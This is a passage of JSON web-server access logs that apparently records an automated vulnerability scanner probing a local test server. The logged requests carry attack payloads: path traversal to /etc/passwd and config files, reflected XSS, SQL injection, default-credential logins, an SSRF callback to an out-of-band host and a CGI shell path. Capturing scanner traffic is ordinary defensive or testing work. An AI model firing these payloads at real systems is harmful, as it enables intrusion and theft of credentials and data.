/spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"{\x22content\x22: \x22include:\x5Cn remote: http://127.0.0.1:9100/test.yml\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cpqlogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"_charset_=utf-8&j_username=admin&j_password=admin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"297MFgJS93gnOEjuM4dZ2SxToTE","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://c9v8gc8smpv8b0ng0t00cx4xnyywm1bfh.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lan.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"_charset_=utf-8&j_username=grios&j_password=password&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/tm/sys/management-ip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 